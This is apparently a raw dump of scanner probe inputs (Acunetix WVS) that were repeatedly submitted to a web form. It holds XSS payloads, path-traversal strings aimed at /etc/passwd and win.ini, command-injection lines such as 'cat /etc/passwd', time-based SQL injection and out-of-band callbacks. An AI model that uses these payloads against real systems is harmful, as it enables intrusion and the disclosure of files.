H1bz6BII'))

comments

1

1

1

'&dir&'

1

<!--

1

WEB-INF/web.xml

1

1

1

comments/.

1'"()&%<ScRiPt >prompt(964725)</ScRiPt>

WEB-INF\web.xml

1

1

"&dir&"

'"()&%<ScRiPt >prompt(991760)</ScRiPt>

1

1

1

|dir

1

../../../../../../../../../../windows/win.ini

1

1_947471

1

1

1

'|dir

acu3841\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca3841

../../../../../../../../../../boot.ini

1

1

1

"|dir

../../../../../../../../../../windows/win.ini.jpg

1

acux2525\xc0\xbez1\xc0\xbcz2a\x90bcxuca2525

1

1

1

1<ScRiPt >prompt(965610)</ScRiPt>

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

................windowswin.ini

1

1<script>prompt(923209)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(954409)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?947556></ScRiPt>

1

1

1

1<ScRiPt >prompt(909084)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1

1

1<video><source onerror="javascript:prompt(909109)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9645528*9528670)

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(938541)"></g></svg>

'+response.write(9645528*9528670)+'

1

1

1

1<div style=width:expression(prompt(924156))>

&cat /etc/passwd&

WEB-INF/web.xml

1

1

"+response.write(9645528*9528670)+"

SomeCustomInjectedHeader:injected_by_wvs

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

'&cat /etc/passwd&'

1<iframe src='data:text/html

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<body onload=prompt(902728)>

"&cat /etc/passwd&"

-1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

-1)

cat /etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(957521)>

../../../../../../../../../../etc/passwd.jpg

1

1

1

1

1

`cat /etc/passwd`

-1))

1<img src=xyz OnErRor=prompt(952120)>

${99864+99099}

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1<img/src=">" onerror=alert(937528)>

qnT0KJkf'

|cat /etc/passwd#

1&n961183=v980027

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

1

1<ScRiPt%20>prompt(979276)</sCripT>

Ax7oae8F')

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

1

'|'ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

FHfr4AYG'))

1&lt

1

testasp.vulnweb.com

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

1

-1

^(#$!@#$)(()))******

1

1

'"()

\xf6<img acu onmouseover=prompt(900083) //\xf6>

/etc/passwd

-1)

'

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1<input autofocus onfocus=prompt(935477)>

1

1

-1))

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

'

1

1

1

QMnHZDH9'

${@print(md5(acunetix_wvs_security_test))}

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

<a href='http://www.acunetix.com'>website security</a>

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

1

"

Jff3s15M')

[url=http://www.acunetix.com]website security[/url]

${@print(md5(acunetix_wvs_security_test))}\

1

1

http://hitv7qNeb9Hya.bxss.me/

file:///etc/passwd

Yd8YV6kd'))

1

1

||cat /etc/passwd

acunetix_wvs_invalid_filename

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1_wLIVD <ScRiPt >prompt(960593)</ScRiPt>

1

1

&dir

1

1

1

/\../\../\../\../\../\../\../etc/passwd

comments

1

1

1

1

http://www.acunetix.tst

'&dir&'

1

'"

1

comments

WEB-INF/web.xml

1

"&dir&"

1

1'"()&%<ScRiPt >prompt(954776)</ScRiPt>

1

1

<!--

1

WEB-INF\web.xml

1

comments/.

|dir

1

1

1

'"()&%<ScRiPt >prompt(991999)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

'|dir

1

1

../../../../../../../../../../boot.ini

1

1_953400

1

"|dir

1

../../../../../../../../../../windows/win.ini.jpg

acu5209\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca5209

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1

acux3524\xc0\xbez1\xc0\xbcz2a\x90bcxuca3524

................windowswin.ini

1

1

1

1<ScRiPt >prompt(977498)</ScRiPt>

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<script>prompt(964991)</script>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(903022)</ScRiPt>

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?919378></ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

1<ScRiPt >prompt(942045)</ScRiPt>

1

1

WEB-INF/web.xml

1

1<video><source onerror="javascript:prompt(935074)">

1

response.write(9292506*9817948)

WEB-INF\web.xml

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(924790)"></g></svg>

1

1

1

'+response.write(9292506*9817948)+'

&cat /etc/passwd&

1

1<div style=width:expression(prompt(971153))>

1

1

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9292506*9817948)+"

1

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<iframe src='data:text/html

"&cat /etc/passwd&"

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

1

1

cat /etc/passwd

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<body onload=prompt(914986)>

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(959635)>

-1

`cat /etc/passwd`

1

../../../../../../../../../../etc/passwd.jpg

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1<img src=xyz OnErRor=prompt(962721)>

${100464+99412}

1

|cat /etc/passwd#

1

1

1&n904074=v939481

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1some_inexistent_file_with_long_name%00.jpg

1

1

1

'|'ld

1<img/src=">" onerror=alert(999912)>

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

nnVrv4MK'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

)

1

1<ScRiPt%20>prompt(947639)</sCripT>

"|"ld

testasp.vulnweb.com

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

S8SpCID2')

1

1

1

'"()

1&lt

'

1

vQGF8oEs'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

^(#$!@#$)(()))******

"

\xf6<img acu onmouseover=prompt(900372) //\xf6>

'

1

1

-1

1

/etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}

1

-1)

1

"

1<input autofocus onfocus=prompt(979504)>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

-1))

1

1

<a href='http://www.acunetix.com'>website security</a>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

http://hithzjzDCAA3X.bxss.me/

MAM9XqVz'

acunetix_wvs_invalid_filename

1

1

1

vdgYXr5E')

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

[url=http://www.acunetix.com]website security[/url]

&dir

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

7nQxxjOl'))

1

1

comments

1

1

'&dir&'

1_IBSHD <ScRiPt >prompt(980205)</ScRiPt>

1

comments

1

'"

http://www.acunetix.tst

1

1'"()&%<ScRiPt >prompt(964660)</ScRiPt>

1

1

file:///etc/passwd

"&dir&"

comments/.

1

1

1

<!--

'"()&%<ScRiPt >prompt(974353)</ScRiPt>

1

1

|dir

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1

1_983360

1

'|dir

1

1

1

WEB-INF/web.xml

"|dir

1

1

1

1

acu7776\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7776

WEB-INF\web.xml

1

1

1

acux2230\xc0\xbez1\xc0\xbcz2a\x90bcxuca2230

1

../../../../../../../../../../windows/win.ini

1

1

1

1

1<ScRiPt >prompt(958804)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<script>prompt(902240)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(946818)</ScRiPt>

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?989889></ScRiPt>

................windowswin.ini

1

1

1<ScRiPt >prompt(986645)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(934995)">

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

response.write(9589111*9999986)

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(973773)"></g></svg>

1

'+response.write(9589111*9999986)+'

&cat /etc/passwd&

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

"+response.write(9589111*9999986)+"

1<div style=width:expression(prompt(965514))>

1

'&cat /etc/passwd&'

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1<iframe src='data:text/html

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<body onload=prompt(908727)>

cat /etc/passwd

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

WEB-INF/web.xml

1

1

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd.jpg

${99738+99108}

-1

`cat /etc/passwd`

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(985518)>

WEB-INF\web.xml

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1

1<img src=xyz OnErRor=prompt(953539)>

1

|cat /etc/passwd#

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1&n932230=v925418

-1))

1some_inexistent_file_with_long_name%00.jpg

1

1<img/src=">" onerror=alert(924743)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

'|'ld

1

)

1

1

1

1<ScRiPt%20>prompt(969123)</sCripT>

Sgc9jsIs'

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

"|"ld

1

!(()&&!|*|*|

1

/etc/passwd

vqzruGd1')

testasp.vulnweb.com

1&lt

'

1

^(#$!@#$)(()))******

'

1

'"()

\xf6<img acu onmouseover=prompt(970558) //\xf6>

"

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

d18tEaXs'))

1

1

1

"

1

1<input autofocus onfocus=prompt(950618)>

||cat /etc/passwd

http://testasp.vulnweb.com/t/xss.html?%00.jpg

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1

1

1

1

&dir

1

<a href='http://www.acunetix.com'>website security</a>

${@print(md5(acunetix_wvs_security_test))}

1

1

1

-1)

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

'&dir&'

${@print(md5(acunetix_wvs_security_test))}\

http://hitHhAa8GBoNO.bxss.me/

1

[url=http://www.acunetix.com]website security[/url]

1

acunetix_wvs_invalid_filename

"&dir&"

-1))

1

1

1

1_hdTNb <ScRiPt >prompt(983554)</ScRiPt>

1

1

file:///etc/passwd

1

ZVjPzU47'

|dir

comments

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

/\../\../\../\../\../\../\../etc/passwd

1

http://www.acunetix.tst

1

1

1

1

'|dir

comments

g74mhTqj')

WEB-INF/web.xml

1

1

1

'"

1

1'"()&%<ScRiPt >prompt(984402)</ScRiPt>

vm04AMTz'))

comments/.

WEB-INF\web.xml

"|dir

1

1

'"()&%<ScRiPt >prompt(985581)</ScRiPt>

1

<!--

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1_908273

../../../../../../../../../../boot.ini

1

1

1

1

1

1

1

acu8973\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8973

../../../../../../../../../../windows/win.ini.jpg

1

1

1

1

acux6327\xc0\xbez1\xc0\xbcz2a\x90bcxuca6327

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt >prompt(905468)</ScRiPt>

................windowswin.ini

1

1

1

1<script>prompt(933951)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(950046)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?936295></ScRiPt>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(969726)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(950650)">

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977264)"></g></svg>

1

1

1

WEB-INF/web.xml

1

response.write(9488334*9318352)

1<div style=width:expression(prompt(945334))>

1

WEB-INF\web.xml

1

'+response.write(9488334*9318352)+'

1

1

1<iframe src='data:text/html

1

1

"+response.write(9488334*9318352)+"

&cat /etc/passwd&

1

1<body onload=prompt(941098)>

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

1

1

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(999119)>

1

1

1

1

"&cat /etc/passwd&"

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

SomeCustomInjectedHeader:injected_by_wvs

1

1

1<img src=xyz OnErRor=prompt(917254)>

1

1

1

-1)

../../../../../../../../../../etc/passwd.jpg

1

cat /etc/passwd

1&n970092=v916417

1<img/src=">" onerror=alert(988900)>

${99788+99504}

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<ScRiPt%20>prompt(975632)</sCripT>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1))

1

`cat /etc/passwd`

1

1some_inexistent_file_with_long_name%00.jpg

1

1

1&lt

|cat /etc/passwd#

)

Ct1UhCKG'

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

\xf6<img acu onmouseover=prompt(951910) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

!(()&&!|*|*|

'|'ld

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

'"()

G0QCqcAQ')

'

1<input autofocus onfocus=prompt(955881)>

"|"ld

testasp.vulnweb.com

^(#$!@#$)(()))******

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

cKtHvg1Y'))

<a href='http://www.acunetix.com'>website security</a>

"

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

1

1

-1

1

'

1

${@print(md5(acunetix_wvs_security_test))}

[url=http://www.acunetix.com]website security[/url]

/etc/passwd

1

-1)

1

1

1

1_S6ftP <ScRiPt >prompt(921566)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

"

http://hit2rD5R53nZe.bxss.me/

1

acunetix_wvs_invalid_filename

1

1

-1))

1

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

comments

1

w6WVIoEx'

1

1

1

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

&dir

WTiGWl29')

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

comments

1

1

4Gqu2WWW'))

'&dir&'

1

1

1

http://www.acunetix.tst

'"

1

comments/.

1

1

1

1'"()&%<ScRiPt >prompt(992226)</ScRiPt>

"&dir&"

1

1

file:///etc/passwd

1

<!--

|dir

'"()&%<ScRiPt >prompt(998739)</ScRiPt>

1

1

1

1

1

/\../\../\../\../\../\../\../etc/passwd

'|dir

1

1_991881

1

1

1

"|dir

WEB-INF/web.xml

acu2416\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2416

1

1

1

WEB-INF\web.xml

1

acux3213\xc0\xbez1\xc0\xbcz2a\x90bcxuca3213

1

1

../../../../../../../../../../windows/win.ini

1

1

1<ScRiPt >prompt(952873)</ScRiPt>

../../../../../../../../../../boot.ini

1

1

1<script>prompt(928171)</script>

1

../../../../../../../../../../windows/win.ini.jpg

1

1<ScRiPt >prompt(949987)</ScRiPt>

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?998152></ScRiPt>

1

................windowswin.ini

1

1

1<ScRiPt >prompt(908352)</ScRiPt>

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(994320)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(948883)"></g></svg>

1

response.write(9061276*9590518)

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

&cat /etc/passwd&

1<div style=width:expression(prompt(954737))>

1

1

'+response.write(9061276*9590518)+'

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1<iframe src='data:text/html

'&cat /etc/passwd&'

SomeCustomInjectedHeader:injected_by_wvs

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

"+response.write(9061276*9590518)+"

../../../../../../../../../../etc/passwd

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

"&cat /etc/passwd&"

1<body onload=prompt(998034)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(921874)>

cat /etc/passwd

1

-1)

1

../../../../../../../../../../etc/passwd.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

WEB-INF/web.xml

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

${100131+100177}

1<img src=xyz OnErRor=prompt(923224)>

`cat /etc/passwd`

-1))

WEB-INF\web.xml

1

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1some_inexistent_file_with_long_name%00.jpg

FT0lq1od'

1

|cat /etc/passwd#

1<img/src=">" onerror=alert(984510)>

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1&n992540=v907555

wSluam4x')

1

'|'ld

1<ScRiPt%20>prompt(989707)</sCripT>

)

1

testasp.vulnweb.com

1

dPYRX4Jp'))

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

"|"ld

1

!(()&&!|*|*|

1

1&lt

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

-1

\xf6<img acu onmouseover=prompt(921774) //\xf6>

'"()

1

^(#$!@#$)(()))******

1

'

1<input autofocus onfocus=prompt(920158)>

-1)

/etc/passwd

1

'

1

1

"

1

1

<a href='http://www.acunetix.com'>website security</a>

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

"

1

-1))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

[url=http://www.acunetix.com]website security[/url]

1

||cat /etc/passwd

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}

1

1

P0AOopfU'

1_2echv <ScRiPt >prompt(914322)</ScRiPt>

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

&dir

http://hit0N9Dd18vDh.bxss.me/

1

1

QnCiAI1Z')

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

1

1

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

comments

qiQScajM'))

1

file:///etc/passwd

"&dir&"

http://www.acunetix.tst

1

1

1

/\../\../\../\../\../\../\../etc/passwd

1

'"

comments

1

1

1

1'"()&%<ScRiPt >prompt(983013)</ScRiPt>

|dir

WEB-INF/web.xml

1

1

<!--

1

comments/.

WEB-INF\web.xml

'"()&%<ScRiPt >prompt(940125)</ScRiPt>

'|dir

1

1

1

1

1

"|dir

1

1

1_971716

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

1

1

acu2558\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2558

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

acux5085\xc0\xbez1\xc0\xbcz2a\x90bcxuca5085

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1<ScRiPt >prompt(986902)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(995827)</script>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt >prompt(908265)</ScRiPt>

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?983208></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<ScRiPt >prompt(954875)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<video><source onerror="javascript:prompt(914040)">

response.write(9102913*9654870)

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977151)"></g></svg>

1

&cat /etc/passwd&

1

1

WEB-INF/web.xml

'+response.write(9102913*9654870)+'

1<div style=width:expression(prompt(957438))>

'&cat /etc/passwd&'

1

1

1<iframe src='data:text/html

"+response.write(9102913*9654870)+"

WEB-INF\web.xml

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

1

1

"&cat /etc/passwd&"

../../../../../../../../../../etc/passwd

1<body onload=prompt(938329)>

1

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

1

1

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(947777)>

cat /etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1

1

1

1

-1

${99805+99816}

1

`cat /etc/passwd`

1<img src=xyz OnErRor=prompt(935007)>

../../../../../../../../../../etc/passwd.jpg

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1

1

1

|cat /etc/passwd#

1

-1))

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1<img/src=">" onerror=alert(901446)>

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

1

)

1&n900330=v971513

4rI4eaCS'

"|"ld

1<ScRiPt%20>prompt(924845)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

51e398wE')

!(()&&!|*|*|

1

'"()

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1&lt

32smuk1o'))

1

testasp.vulnweb.com

\xf6<img acu onmouseover=prompt(953545) //\xf6>

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

1

-1

1

'

1

1<input autofocus onfocus=prompt(904588)>

/etc/passwd

"

1

1

-1)

1

1

"

1

<a href='http://www.acunetix.com'>website security</a>

http://hitFX07Q5lNuN.bxss.me/

||cat /etc/passwd

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

-1))

1

${@print(md5(acunetix_wvs_security_test))}

1

[url=http://www.acunetix.com]website security[/url]

acunetix_wvs_invalid_filename

&dir

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

1

${@print(md5(acunetix_wvs_security_test))}\

1

aPrxeULn'

1

1_NfDV9 <ScRiPt >prompt(905309)</ScRiPt>

1

